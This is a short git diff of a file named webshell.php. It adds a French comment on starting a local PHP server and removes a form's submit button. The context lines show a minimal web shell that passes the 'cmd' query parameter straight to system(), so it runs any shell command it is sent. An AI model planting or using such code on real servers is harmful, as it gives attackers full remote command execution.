diff options
Diffstat (limited to 'webshell.php')
| -rw-r--r-- | webshell.php | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/webshell.php b/webshell.php index 679bb7a..dbb759d 100644 --- a/webshell.php +++ b/webshell.php @@ -1,4 +1,5 @@ <!DOCTYPE html> +<!-- Pour lancer le serveur : php -S localhost 8000 --> <html> <head> <title>Web shell</title> @@ -10,7 +11,6 @@ </p> <form> <input type="text" name="cmd" autofocus /> -<input type="submit" /> </form> <pre> <?php if (isset($_GET['cmd'])) system($_GET['cmd']) ?> |
